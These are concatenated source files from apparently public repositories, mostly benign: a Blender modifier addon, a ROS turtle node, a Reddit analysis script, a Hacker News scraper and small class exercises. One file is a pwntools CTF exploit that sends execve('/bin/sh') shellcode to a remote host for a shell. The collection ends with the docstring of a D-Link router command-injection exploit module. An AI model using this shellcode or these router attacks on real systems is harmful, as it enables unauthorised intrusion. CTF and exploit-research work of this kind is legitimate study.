fu.log("start processsing %i blocks" % len(block_list))
with futures.ThreadPoolExecutor(n_threads) as tp:
tasks = [tp.submit(_solve_block_problem,
block_id, graph, uv_ids, ds_nodes,
costs, lifted_uvs, lifted_costs,
lifted_solver, solver, ignore_label,
blocking, out, time_limit)
for block_id in block_list]
[t.result() for t in tasks]
fu.log_job_success(job_id)
if __name__ == '__main__':
path = sys.argv[1]
assert os.path.exists(path), path
job_id = int(os.path.split(path)[1].split('.')[0].split('_')[-1])
solve_lifted_subproblems(job_id, path)
|
constantinpape/cluster_tools
|
cluster_tools/lifted_multicut/solve_lifted_subproblems.py
|
solve_lifted_subproblems.py
|
py
| 13,622 |
python
|
en
|
code
| 32 |
github-code
|
6
|
70063403388
|
from multiprocessing import context
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# p=process('./pwn')
p=remote('t.ctf.qwq.cc',49468)
pause()
elf=ELF('./pwn')
context.arch ='amd64'
context.bits=64
shellcode=asm('push 0x68;mov rax ,0x68732f6e69622f;push rax;mov rdi,rsp;xor rsi, rsi;xor rdx, rdx;xor rax,rax;add rax,0x3b;syscall')
p.recvuntil(b'Do u know what\'s is it?\n')
payload=shellcode.ljust(0x38,b'a')+b'\x2a'
# payload=b'a'*0x30#+p64(0x7ffdadf3ddf0)
p.send(payload)
p.interactive()
|
CookedMelon/mypwn
|
NPU/shellcode/exp.py
|
exp.py
|
py
| 520 |
python
|
en
|
code
| 3 |
github-code
|
6
|
69893012668
|
import episodes
import praw
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
comments_dict = {
'comment_id': [],
'comment' : [],
'Upvotes_Comment' : [],
'author' : []
}
reddit = episodes.reddit
submission = reddit.submission(id=episodes.episodes[-2])
submission.comments.replace_more(limit=None)
for h in submission.comments:
comments_dict['comment_id'].append(h.id)
comments_dict['comment'].append(h.body)
comments_dict['Upvotes_Comment'].append(h.ups)
comments_dict['author'].append(h.author)
queen_comments = pd.DataFrame(comments_dict)
queens = {'aiden': [], 'sherry': [], 'brita': [], 'heidi': [], 'gigi': [], 'jackie': [], 'widow': [], 'nicky': [], 'crystal': [], 'jaida': [], 'rock m': [], 'dahlia': [], 'jan': []}
queens_copy = queens.copy()
for queen in queens:
for comment in queen_comments.comment:
if queen in comment.lower():
queens[queen].append(1)
else:
queens[queen].append(0)
queens_only = pd.DataFrame(queens)[['aiden', 'sherry', 'brita', 'heidi', 'gigi', 'jackie', 'widow', 'nicky',
'crystal', 'jaida', 'rock m', 'dahlia', 'jan']]
# Plot of the most talked about queens
queens_only.sum().sort_values(ascending=False).plot(kind='bar')
# Let's see which queens appeared together
for queen in queens_copy:
for comment in queen_comments.comment:
if queen in comment.lower():
queens_copy[queen].append(queen)
else:
queens_copy[queen].append(0)
queens_copy = pd.DataFrame(queens_copy)
grouped = []
def groupy(a):
return list(filter(lambda a: a != 0, a))
for i in queens_copy.iterrows():
grouped.append(groupy(i[1].to_list()))
queens_copy['grouped'] = [None if len(x)==0 else x for x in grouped]
# we can see which queens are being talked about together
queens_copy['grouped'].apply(lambda x: x if (x is not None and len(x) > 1) else None).value_counts().head(6).plot(kind='bar')
|
mabolhal/rpdrSeason12
|
rpdr_main.py
|
rpdr_main.py
|
py
| 2,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21480391270
|
from collections import namedtuple, defaultdict
import numpy as np
import bmesh
import bpy
from ..math import get_dist_sq
from ..log import log, logd
from ..helpers import get_context, get_modifier_mask
# shape_key_apply_modifiers TODO:
# - Specialcase more merging modifiers, solidify for example
# - Transfer vertex order. Is it still necessary if all merging modifiers are covered?
# Is it possible to identify which face went where without guessing?
class ShapeKeyInfo(namedtuple('ShapeKeyInfo', ['coords', 'interpolation', 'mute', 'name',
'slider_max', 'slider_min', 'value', 'vertex_group'])):
__slots__ = ()
"""Helper to preserve shape key information."""
@classmethod
def from_shape_key_with_empty_data(cls, shape_key):
return cls(
coords=np.empty(0, dtype=np.single),
interpolation=shape_key.interpolation,
mute=shape_key.mute,
name=shape_key.name,
# relative_key=shape_key.relative_key.name,
slider_max=shape_key.slider_max,
slider_min=shape_key.slider_min,
value=shape_key.value,
vertex_group=shape_key.vertex_group,
)
@classmethod
def from_shape_key(cls, shape_key):
info = cls.from_shape_key_with_empty_data(shape_key)
info.get_coords_from(shape_key.data)
return info
def get_coords_from(self, vertices):
self.coords.resize(len(vertices) * 3, refcheck=False)
vertices.foreach_get('co', self.coords)
def put_coords_into(self, vertices):
vertices.foreach_set('co', self.coords)
def weld_mesh(mesh, weld_map):
"""Welds mesh vertices according to a source index to destination index weld map."""
bm = bmesh.new()
bm.from_mesh(mesh)
bm.verts.ensure_lookup_table()
targetmap = {bm.verts[src_idx]: bm.verts[dst_idx] for src_idx, dst_idx in weld_map.items()}
bmesh.ops.weld_verts(bm, targetmap=targetmap)
bm.to_mesh(mesh)
bm.free()
def apply_modifier(modifier):
try:
bpy.ops.object.modifier_apply(get_context(modifier.id_data), modifier=modifier.name)
except RuntimeError:
logd(f"Couldn't apply {modifier.type} modifier {modifier.name}")
class ModifierHandler:
"""Subclass this to define special behavior when applying different modifiers."""
modifier_type = None
modifier_name = None
def __init__(self, modifier):
self.modifier_name = modifier.name
@classmethod
def poll(cls, modifier):
return cls.modifier_type is None or modifier.type == cls.modifier_type
def apply(self, obj):
apply_modifier(obj.modifiers[self.modifier_name])
class MirrorModifierHandler(ModifierHandler):
modifier_type = 'MIRROR'
weld_map = None # Specifies vertex pairs to be welded
def __init__(self, modifier):
super().__init__(modifier)
self.merge_dist = modifier.merge_threshold
self.num_mirrors = sum(modifier.use_axis)
@classmethod
def poll(cls, modifier):
return super().poll(modifier) and modifier.use_mirror_merge and any(modifier.use_axis)
def apply(self, obj):
modifier = obj.modifiers[self.modifier_name]
modifier.use_mirror_merge = False
bpy.ops.object.modifier_apply(get_context(obj), modifier=modifier.name)
if not self.weld_map:
self.fill_weld_map(obj)
weld_mesh(obj.data, self.weld_map)
def fill_weld_map(self, obj):
mesh = obj.data
num_verts = len(mesh.vertices) // (2 ** self.num_mirrors) # Num of verts before mirroring
merge_dist_sq = self.merge_dist ** 2
# Only consider pairs of mirrored vertices for merging. Probably breaks if flip is enabled
welds = []
for n in range(self.num_mirrors):
num_part_verts = num_verts * (2 ** n)
new_welds = []
for src_idx, dst_idx in welds:
new_welds.append((src_idx + num_part_verts, dst_idx + num_part_verts))
welds.extend(new_welds)
for vert_idx in range(num_part_verts):
vert = mesh.vertices[vert_idx]
other_vert_idx = vert_idx + num_part_verts
other_vert = mesh.vertices[other_vert_idx]
if get_dist_sq(vert.co, other_vert.co) <= merge_dist_sq:
welds.append((other_vert_idx, vert_idx))
# Resolve the welds into a single dict. Not too robust but weld_verts doesn't complain
self.weld_map = weld_map = {}
weld_map_reverse = defaultdict(list)
for src_idx, dst_idx in welds:
dst_idx = weld_map.get(dst_idx, dst_idx)
weld_map[src_idx] = dst_idx
old_idxs = weld_map_reverse.get(src_idx, [])
for old_idx in old_idxs:
weld_map[old_idx] = dst_idx
weld_map_reverse[dst_idx].append(old_idx)
weld_map_reverse[dst_idx].append(src_idx)
class WeldModifierHandler(ModifierHandler):
modifier_type = 'WELD'
weld_map = None # Specifies vertex pairs to be welded
def __init__(self, modifier):
super().__init__(modifier)
self.merge_dist = modifier.merge_threshold
self.vertex_group = modifier.vertex_group
self.invert_vertex_group = modifier.invert_vertex_group
@classmethod
def poll(cls, modifier):
return super().poll(modifier) and modifier.mode == 'ALL'
def apply(self, obj):
modifier = obj.modifiers[self.modifier_name]
bpy.ops.object.modifier_remove(get_context(obj), modifier=modifier.name)
if not self.weld_map:
self.fill_weld_map(obj)
weld_mesh(obj.data, self.weld_map)
def fill_weld_map(self, obj):
mesh = obj.data
vg = obj.vertex_groups.get(self.vertex_group)
invert = self.invert_vertex_group
bm = bmesh.new()
bm.from_mesh(mesh)
bm.verts.ensure_lookup_table()
deform_layer = bm.verts.layers.deform.active
if deform_layer and vg:
# Handle vertex group filtering
verts = [v for v in bm.verts if bool(v[deform_layer].get(vg.index, 0.0)) != invert]
else:
verts = bm.verts
targetmap = bmesh.ops.find_doubles(bm, verts=verts, dist=self.merge_dist)['targetmap']
self.weld_map = {src.index: dst.index for src, dst in targetmap.items()}
bm.free()
modifier_handler_classes = (
MirrorModifierHandler,
WeldModifierHandler,
ModifierHandler,
)
# Incomplete map of modifier type to icon
modifier_icons = {
'DATA_TRANSFER': 'MOD_DATA_TRANSFER',
'MESH_CACHE': 'MOD_MESHDEFORM',
'MESH_SEQUENCE_CACHE': 'MOD_MESHDEFORM',
'NORMAL_EDIT': 'MOD_NORMALEDIT',
'WEIGHTED_NORMAL': 'MOD_NORMALEDIT',
'UV_PROJECT': 'MOD_UVPROJECT',
'UV_WARP': 'MOD_UVPROJECT',
'VERTEX_WEIGHT_EDIT': 'MOD_VERTEX_WEIGHT',
'VERTEX_WEIGHT_MIX': 'MOD_VERTEX_WEIGHT',
'VERTEX_WEIGHT_PROXIMITY': 'MOD_VERTEX_WEIGHT',
'ARRAY': 'MOD_ARRAY',
'BEVEL': 'MOD_BEVEL',
'BOOLEAN': 'MOD_BOOLEAN',
'BUILD': 'MOD_BUILD',
'DECIMATE': 'MOD_DECIM',
'EDGE_SPLIT': 'MOD_EDGESPLIT',
'NODES': 'NODETREE',
'MASK': 'MOD_MASK',
'MIRROR': 'MOD_MIRROR',
'MULTIRES': 'MOD_MULTIRES',
'REMESH': 'MOD_REMESH',
'SCREW': 'MOD_SCREW',
'SKIN': 'MOD_SKIN',
'SOLIDIFY': 'MOD_SOLIDIFY',
'SUBSURF': 'MOD_SUBSURF',
'TRIANGULATE': 'MOD_TRIANGULATE',
'VOLUME_TO_MESH': 'VOLUME_DATA',
'WELD': 'AUTOMERGE_OFF',
'WIREFRAME': 'MOD_WIREFRAME',
'ARMATURE': 'MOD_ARMATURE',
'CAST': 'MOD_CAST',
'CURVE': 'MOD_CURVE',
'DISPLACE': 'MOD_DISPLACE',
'HOOK': 'HOOK',
'LAPLACIANDEFORM': 'MOD_MESHDEFORM',
'LATTICE': 'MOD_LATTICE',
'MESH_DEFORM': 'MOD_MESHDEFORM',
'SHRINKWRAP': 'MOD_SHRINKWRAP',
'SIMPLE_DEFORM': 'MOD_SIMPLEDEFORM',
'SMOOTH': 'MOD_SMOOTH',
'CORRECTIVE_SMOOTH': 'MOD_SMOOTH',
'LAPLACIANSMOOTH': 'MOD_SMOOTH',
'SURFACE_DEFORM': 'MOD_MESHDEFORM',
'WARP': 'MOD_WARP',
'WAVE': 'MOD_WAVE',
}
ignored_modifier_types = frozenset((
'CLOTH',
'COLLISION',
'DYNAMIC_PAINT',
'EXPLODE',
'FLUID',
'OCEAN',
'PARTICLE_INSTANCE',
'PARTICLE_SYSTEM',
'SOFT_BODY',
))
class GRET_OT_shape_key_apply_modifiers(bpy.types.Operator):
"""Applies viewport modifiers while preserving shape keys"""
bl_idname = "gret.shape_key_apply_modifiers"
bl_label = "Apply Modifiers with Shape Keys"
bl_context = "objectmode"
bl_options = {'REGISTER', 'UNDO'}
modifier_mask: bpy.props.BoolVectorProperty(
name="Apply Modifier",
description="Whether this modifier should be applied",
size=32, # Maximum allowed by Blender, will need some hack if more are required
default=[True] * 32,
)
modifier_info = [] # Only used to draw buttons when operator is invoked
@classmethod
def poll(cls, context):
return context.mode == 'OBJECT' and context.object and context.object.type == 'MESH'
def draw(self, context):
layout = self.layout
layout.ui_units_x = 10.0
obj = context.object
layout.label(text="Select modifiers to apply:")
col = layout.column(align=True)
for modifier_index, (modifier_type, modifier_name) in enumerate(self.modifier_info):
if modifier_type in ignored_modifier_types:
continue
icon = modifier_icons.get(modifier_type, 'BLANK1')
col.prop(self, 'modifier_mask', index=modifier_index, icon=icon, text=modifier_name)
def invoke(self, context, event):
obj = context.object
# Cache modifier info to be shown on panel. Otherwise redo_last won't work correctly
# Side note: the displayed icon for show_viewport is hardcoded to change when toggled on
def should_apply_modifier(mod):
return (mod.show_viewport
and mod.type not in ignored_modifier_types
and mod.type != 'ARMATURE') # Don't apply armatures by default
self.modifier_info = [(mod.type, mod.name) for mod in obj.modifiers]
self.modifier_mask = get_modifier_mask(obj, should_apply_modifier)
return context.window_manager.invoke_props_dialog(self)
def execute(self, context):
obj = context.active_object
if not any(self.modifier_mask[:len(obj.modifiers)]):
# There are no modifiers to apply
return {'FINISHED'}
if obj.data.users > 1:
# Make single user copy
obj.data = obj.data.copy()
num_shape_keys = len(obj.data.shape_keys.key_blocks) if obj.data.shape_keys else 0
if not num_shape_keys:
# No shape keys, just apply the modifiers
for modifier, mask in zip(obj.modifiers[:], self.modifier_mask):
if mask:
apply_modifier(modifier)
return {'FINISHED'}
print(f"Applying modifiers with {num_shape_keys} shape keys")
mesh_copy = obj.data.copy() # Copy for convenience, to be able to call from_existing(fcurve)
shape_keys = obj.data.shape_keys.key_blocks if obj.data.shape_keys else []
shape_key_infos = []
saved_active_shape_key_index = obj.active_shape_key_index
saved_show_only_shape_key = obj.show_only_shape_key
# Start by separating each shape key so modifiers can be applied one by one
shape_key_objs = []
for shape_key in shape_keys:
shape_key_info = ShapeKeyInfo.from_shape_key(shape_key)
shape_key_infos.append(shape_key_info)
new_obj = obj.copy()
new_obj.name = f"{obj.name}_{shape_key.name}"
new_obj.data = obj.data.copy()
shape_key_objs.append(new_obj)
# Handle modifiers accordingly. This means recording welded vertex pairs for mirrors and such
obj.shape_key_clear()
modifier_handlers = []
for modifier, mask in zip(obj.modifiers[:], self.modifier_mask):
if mask:
for modifier_handler_cls in modifier_handler_classes:
if modifier_handler_cls.poll(modifier):
modifier_handler = modifier_handler_cls(modifier)
modifier_handler.apply(obj)
modifier_handlers.append(modifier_handler)
break
# Store vertex coordinates of each shape key with modifiers applied
for sk_info, sk_obj in zip(shape_key_infos, shape_key_objs):
sk_mesh = sk_obj.data
sk_obj.shape_key_clear()
sk_info.put_coords_into(sk_mesh.vertices)
for modifier_handler in modifier_handlers:
modifier_handler.apply(sk_obj)
sk_info.get_coords_from(sk_mesh.vertices)
bpy.data.objects.remove(sk_obj)
bpy.data.meshes.remove(sk_mesh)
# Add the shape keys back
for shape_key_info in shape_key_infos:
shape_key = obj.shape_key_add()
shape_key.interpolation = shape_key_info.interpolation
shape_key.mute = shape_key_info.mute
shape_key.name = shape_key_info.name
shape_key.slider_max = shape_key_info.slider_max
shape_key.slider_min = shape_key_info.slider_min
shape_key.value = shape_key_info.value
shape_key.vertex_group = shape_key_info.vertex_group
if len(shape_key.data) * 3 != len(shape_key_info.coords):
self.report({'ERROR'}, f"Vertex count for {shape_key.name} did not match, "
"the shape key will be lost.")
continue
shape_key_info.put_coords_into(shape_key.data)
# Recreate drivers
if mesh_copy.shape_keys and mesh_copy.shape_keys.animation_data:
for fcurve in mesh_copy.shape_keys.animation_data.drivers:
if obj.data.shape_keys.animation_data is None:
obj.data.shape_keys.animation_data_create()
obj.data.shape_keys.animation_data.drivers.from_existing(src_driver=fcurve)
# Clean up
obj.show_only_shape_key = saved_show_only_shape_key
obj.active_shape_key_index = saved_active_shape_key_index
bpy.data.meshes.remove(mesh_copy)
return {'FINISHED'}
def draw_menu(self, context):
self.layout.operator(GRET_OT_shape_key_apply_modifiers.bl_idname, icon='CHECKMARK')
def register(settings, prefs):
bpy.utils.register_class(GRET_OT_shape_key_apply_modifiers)
bpy.types.MESH_MT_shape_key_context_menu.append(draw_menu)
def unregister():
bpy.types.MESH_MT_shape_key_context_menu.remove(draw_menu)
bpy.utils.unregister_class(GRET_OT_shape_key_apply_modifiers)
|
greisane/gret
|
mesh/shape_key_apply_modifiers.py
|
shape_key_apply_modifiers.py
|
py
| 15,203 |
python
|
en
|
code
| 298 |
github-code
|
6
|
33550488518
|
from tkinter import *
from tkinter.messagebox import showinfo, showerror
import random
cards = {"shown": random.randint(1, 13), "secret": random.randint(1, 13)}
window = Tk()
window.title("High-Low Card Game")
window.geometry("300x100")
Label(window, text="The shown card is, ").grid(row=0, column=0)
shown_card_label = Label(window, text=cards["shown"])
shown_card_label.grid(row=0, column=1)
Label(window, text="Is the next one going to be higher or lower?").grid(
row=1, column=0, columnspan=2
)
def clicked(chosen):
correct_high = chosen == "higher" and cards["secret"] > cards["shown"]
correct_low = chosen == "lower" and cards["secret"] < cards["shown"]
if correct_high or correct_low:
showinfo(message=f"you WON! the hidden card was {cards['secret']}")
else:
showerror(message=f"you LOST! the hidden card was {cards['secret']}")
cards["shown"] = cards["secret"]
cards["secret"] = random.randint(1, 13)
shown_card_label.configure(text=cards["shown"])
Button(
window, text="Lower", command=lambda: clicked("lower"), background="green3"
).grid(row=2, column=0)
Button(
window, text="Higher", command=lambda: clicked("higher"), background="red3"
).grid(row=2, column=1)
def on_closing():
if showinfo(message="Thank you for playing, goodbye :)"):
window.destroy()
window.protocol("WM_DELETE_WINDOW", on_closing)
window.mainloop()
|
gabrielecalvo/Language4Water
|
archive/2021-22_semester2/bespoke_samples/desktop_gui/tkinter/1_high_low.py
|
1_high_low.py
|
py
| 1,414 |
python
|
en
|
code
| 4 |
github-code
|
6
|
22751373229
|
'''
Created on Apr 29, 2014
@author: oliwa
'''
class DataHolderForDirectOutput(object):
'''
Holds the direct results data from the NMAUnified that is to be outputted.
'''
def __init__(self, protein1_A_name):
'''
Constructor
Args:
protein1_A_name: the name of the protein1_A_name
'''
self.protein1_A_name = protein1_A_name
# whole references to the direct data
RMSD_unbound_to_superposed_bound = None
RMSDReductionsWhole = None
overlapTApproxWhole = None
stepPointsReductionWhole = None
overlapArrayWhole = None
cumulOverlapWholePrody = None
collectivityArrayWhole = None
correlationArrayWhole = None
# interface references to the direct data
RMSD_interface = None
RMSDReductionsInterface = None
overlapTApproxInterface = None
stepPointsReductionInterface = None
overlapArrayInterface = None
cumulOverlapInterfacePrody = None
collectivityArrayInterface = None
correlationArrayInterface = None
# distance measures (I-rms, ligand-rms)
counterpart_rms = None
L_rms = None
I_rms_before_align = None
I_rms_after_align = None
# L_RMS reduction
L_RMSReductions = None
L_RMSD_unbound_to_superposed_bound = None
# pdbs
reference = None
mobile = None
unboundCounterpart = None
boundCountertpart = None
unboundComplex = None
boundComplex = None
refChain = None
refChainInterface = None
mobChain = None
mobChainInterface = None
unboundCounterpartChain = None
unboundCounterpartChainInterface = None
boundCounterpartChain = None
boundCounterpartChainInterface = None
unboundComplexAlignedChain = None
unboundComplexChainInterface = None
boundComplexChain = None
boundComplexChainInterface = None
#overlap of Marray superset
singleModeOverlapsFromSuperset = None
deformationSnapshots = None
#lambdaR for complex
indicesOfLambdaRSorting = None
|
Shen-Lab/cNMA
|
Software/DataHolderForDirectOutput.py
|
DataHolderForDirectOutput.py
|
py
| 2,230 |
python
|
en
|
code
| 4 |
github-code
|
6
|
35951119766
|
class hamming():
def dystans(self,a, b):
if type(a) != str or type(b) != str:
raise ValueError("a lub b nie jest str")
if len(a) != len(b):
raise ValueError("dlugosc a nie rowna dlugosci b")
wynik = 0
for i in range(len(b)):
if a[i] != b[i]:
wynik += 1
return wynik
|
TestowanieAutomatyczneUG/laboratorium-13-matt1sor
|
zad2/src/hamming.py
|
hamming.py
|
py
| 361 |
python
|
pl
|
code
| 0 |
github-code
|
6
|
26053687100
|
from itertools import permutations
vowels = ["а"]
consonants = ["б", "т", "с"]
result = set()
for index, i in enumerate(permutations("аббатиса")):
correct = True
for symbol_index in range(0, len(i) - 1):
if (i[symbol_index] in vowels and i[symbol_index + 1] in vowels) or \
(i[symbol_index] in consonants and i[symbol_index + 1] in consonants):
correct = False
break
if correct:
result.add(i)
print(len(result))
|
Woolfer0097/UGE_IT
|
8 task/235.py
|
235.py
|
py
| 495 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41058579846
|
class Poly:
def __init__(self,*terms):
# __str__ uses the name self.terms for the dictionary of terms
# So __init__ should build this dictionary from terms
self.terms = {}
if terms:
for term in terms:
power = term[1]
coeff = term[0]
if type(coeff) in (int, float) and (type(power) == int and power >= 0):
if power in self.terms and coeff != 0:
raise AssertionError('Poly.__init__: same power cannot appear as later term')
elif coeff == 0:
pass
else:
self.terms[power] = coeff
else:
raise AssertionError
# Fill in the rest of this method, using *terms to intialize self.terms
# I have written str(...) because it is used in the bsc.txt file and
# it is a bit subtle to get correct. Notice that it assumes that
# every Poly object stores a dict whose keys are powers and whose
# associated values are coefficients. This function does not depend
# on any other method in this class being written correctly.
def __str__(self):
def term(c,p,var):
return (str(c) if p == 0 or c != 1 else '') +\
('' if p == 0 else var+('^'+str(p) if p != 1 else ''))
if len(self.terms) == 0:
return '0'
else:
return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')
def __repr__(self):
pair = ''
for power, coeff in self.terms.items():
pair += '('+str(coeff)+','+str(power)+'),'
pair = pair.strip(',')
return 'Poly('+pair+')'
def __len__(self):
if self.terms:
return sorted(self.terms.items(), reverse=True)[0][0]
else:
return 0
def __call__(self,arg):
value = 0
for power, coeff in self.terms.items():
value += coeff*(arg**power)
return value
def __iter__(self):
for power, coeff in sorted(self.terms.items(), reverse=True):
yield coeff, power
def __getitem__(self,index):
if type(index) == int and index >=0:
if index not in self.terms:
return 0
else:
return self.terms[index]
else:
raise TypeError
def __setitem__(self,index,value):
if type(index) == int and index >= 0:
if value == 0:
if index in self.terms.keys():
del self.terms[index]
else:
self.terms[index] = value
else:
raise TypeError
def __delitem__(self,index):
if type(index) == int and index >= 0:
if index in self.terms:
del self.terms[index]
else:
raise TypeError
def _add_term(self,c,p):
if type(c) in (int, float) and type(p) == int and p >= 0:
if p not in self.terms and c != 0:
self.terms[p] = c
elif p in self.terms:
if self.terms[p] + c == 0:
del self.terms[p]
else:
self.terms[p] = self.terms[p] + c
else:
raise TypeError
def __add__(self,right):
new = Poly()
if type(right) == Poly:
for p, c in right.terms.items():
new._add_term(c, p)
for p, c in self.terms.items():
new._add_term(c, p)
elif type(right) in (int, float):
new._add_term(right, 0)
for p, c in self.terms.items():
new._add_term(c, p)
else:
raise TypeError
return new
def __radd__(self,left):
return self.__add__(left)
def __mul__(self,right):
new = Poly()
if type(right) == Poly:
if right.terms:
new = self
for p, c in right.terms.items():
if c == 0:
for power, coeff in new.terms.items():
new.terms[power] = new.terms[power] * c
else:
for power, coeff in new.terms.items():
new.terms[power + p] = new.terms[power]
#del new.terms[power]
elif type(right) in (int, float):
for power, coeff in new.terms.items():
new.terms[power] = coeff * right
else:
raise TypeError
return new
def __rmul__(self,left):
pass
def __eq__(self,right):
if type(right) == Poly:
return self.terms == right.terms
if __name__ == '__main__':
# Some simple tests; you can comment them out and/or add your own before
# the driver is called.
print('Start simple tests')
p = Poly((3,2),(-2,1), (4,0))
print(' For Polynomial: 3x^2 - 2x + 4')
print(' str(p):',p)
print(' repr(p):',repr(p))
print(' len(p):',len(p))
print(' p(2):',p(2))
print(' list collecting iterator results:',[t for t in p])
print(' p+p:',p+p)
print(' p+2:',p+2)
print(' p*p:',p*p)
print(' p*2:',p*2)
print('End simple tests\n')
import driver
#driver.default_show_exception=True
#driver.default_show_exception_message=True
#driver.default_show_traceback=True
driver.driver()
|
solomc1/python
|
ics 33/solutions/ile2 solutions/Lab 5/LiTina/poly.py
|
poly.py
|
py
| 5,891 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9485038359
|
#!/usr/bin/env python3
# import ROS for developing the node
import rospy
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
# for reading the force commands
force = 0.0
pos_cur = float()
key_released = True # by default we assume that they arrow key on keyboard is not pressed
# get the force value
def get_force(data):
global force
global key_released
force = data.linear.x # update the force value
key_released = False # now the key is pressed
# read the position value
def pose_callback(data):
global pos_cur
pos_cur = data.x
if __name__ == '__main__':
# initialize the node
rospy.init_node('turtle_inertia', anonymous = True)
# declare a publisher to publish in the velocity command topic
cmd_pub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size = 10)
# define the force command subscriber
force_sub = rospy.Subscriber("/turtle1/cmd_force", Twist, get_force)
# add a subscriber to it to read the position information
pos_sub = rospy.Subscriber('/turtle1/pose', Pose, pose_callback)
# set a 10Hz frequency for this loop
freq = 10
loop_rate = rospy.Rate(freq)
# define the delta t
dt = 1/freq
# declare a variable of type Twist for sending control commands
vel_cmd = Twist()
# define the paremeters of the equations
mass = 1.0 # m in the equations (kg)
damping = 1.0 # b in the equations (Ns/m)
vel_next = 0.0 # initialize the next velocity
pos_prev = 0.0 # initialize the previous position
# run this control loop regularly
while not rospy.is_shutdown():
print(key_released)
if key_released:
force = 0.0 # make sure to remove non-zero commands when key is released
vel_cur = (pos_cur - pos_prev)/dt
vel_next = dt/mass*(force - damping*vel_cur) + vel_cur
print('force = ', force, ' (N) and linear velocity=', vel_cur, 'm/s', 'and next velocity=', vel_next, 'm/s')
# set the linear (forward/backward) velocity command
vel_cmd.linear.x = vel_next
cmd_pub.publish(vel_cmd)
# update the pose for next iteration
pos_prev = pos_cur
key_released = True # assume the key is not pressed unless we receive a new command which proves otherwise
# wait for 0.1 seconds until the next loop and repeat
loop_rate.sleep()
|
hsaeidi-uncw/robot_filtering_lectures
|
scripts/turtle_inertia.py
|
turtle_inertia.py
|
py
| 2,203 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74658796346
|
import sys
import turtle
import numpy as np
import random
from . import lsystem
def deviate(value, dev):
return value * (2 ** np.random.normal(dev[0], dev[1])) + dev[2] + random.uniform(-dev[3], +dev[3])
#def draw_leaf(t):
def turtle_interprate(symbols, distance=5, angle=45, init_pos=(0,0), speed=0, pen_color='white', bg_color='black', mode='instant', print_progress=False, distance_dev=(0,0,0,0), angle_dev=(0,0,0,0)):
window = turtle.Screen()
window.bgcolor(bg_color)
if print_progress:
symbols_len = len(symbols)
if mode == 'instant':
turtle.tracer(0,0)
turtle.tracer(0,0)
stack = []
t = turtle.Turtle()
t.speed(speed)
t.setheading(90)
t.up()
t.goto(init_pos)
t.pencolor(pen_color)
for i, symbol in enumerate(symbols):
if symbol.char == 'F':
t.down()
if (symbol.parameters):
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == 'T':
t.down()
if (symbol.parameters):
t.pensize(symbol.parameters[1])
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == 'f':
t.up()
if (symbol.parameters):
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == '+':
if (symbol.parameters):
t.left(deviate(symbol.parameters[0], angle_dev))
else:
t.left(deviate(angle, angle_dev))
elif symbol.char == '-':
if (symbol.parameters):
t.right(deviate(symbol.parameters[0], angle_dev))
else:
t.right(deviate(angle, angle_dev))
elif symbol.char == '[':
stack.append([t.pos(), t.heading()])
elif symbol.char == ']':
t.hideturtle()
t.up()
pos, heading = stack.pop()
t.goto(pos)
t.setheading(heading)
elif symbol.char == '!' and symbol.parameters:
t.pensize(symbol.parameters[0])
if print_progress:
sys.stdout.write('\r' + 'Progress : ' + str(round((i/symbols_len)*100)) + '%')
t.hideturtle()
while True:
if mode == 'instant':
turtle.update()
|
valentinlageard/lindertree
|
lindertree/turtle_interprate.py
|
turtle_interprate.py
|
py
| 2,087 |
python
|
en
|
code
| 1 |
github-code
|
6
|
17430789952
|
#!/usr/bin/python
# https://www.udemy.com/course/complete-python-developer-zero-to-mastery/
# 246. Hacker News Project
# https://www.synerzip.com/blog/web-scraping-introduction-applications-and-best-practices/
# https://www.crummy.com/software/BeautifulSoup/
# https://www.crummy.com/software/BeautifulSoup/bs4/doc/
# https://scrapy.org/
# https://developer.mozilla.org/en-US/docs/Learn/CSS/Building_blocks/Selectors
# https://www.w3schools.com/css/css_selectors.asp
# https://www.w3schools.com/cssref/css_selectors.asp
# https://docs.python.org/3/library/pprint.html
# pip install beautifulsoup4
# pip install requests
from bs4 import BeautifulSoup
import requests
import pprint
RES= 'https://news.ycombinator.com/news'
POINTS = 200
res = requests.get(RES)
soup = BeautifulSoup(res.text, 'html.parser')
links = soup.select('.storylink')
subtext = soup.select('.subtext')
for i in range(2,4):
res = requests.get(RES+'?p='+str(i))
soup = BeautifulSoup(res.text, 'html.parser')
links += soup.select('.storylink')
subtext += soup.select('.subtext')
def sort_stories_by_votes(hnlist):
return sorted(hnlist, key=lambda k:k['points'], reverse=True)
def create_custom_hn(links, subtext):
hn = []
for idx, item in enumerate(links):
title= item.getText()
href=item.get('href', None)
vote=subtext[idx].select('.score')
if len(vote):
points=int(vote[0].getText().replace(' points', ''))
if points >= POINTS:
hn.append({'title':title, 'link':href, 'points':points})
return sort_stories_by_votes(hn)
hacker_news= create_custom_hn(links, subtext)
pprint.pprint(hacker_news)
|
olexandrch/UdemyCompletePythonDeveloper
|
Sec.18 246 Hacker News Project.py
|
Sec.18 246 Hacker News Project.py
|
py
| 1,683 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37431499468
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Dlink DIAGNOSTIC.PHP命令执行
referer: https://www.exploit-db.com/exploits/24956
author: Lucifer
description: Some D-Link Routers are vulnerable to OS Command injection in the web interface.
On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability,
which has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability.
Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands.
Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.
This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability.
'''
import sys
import json
import requests
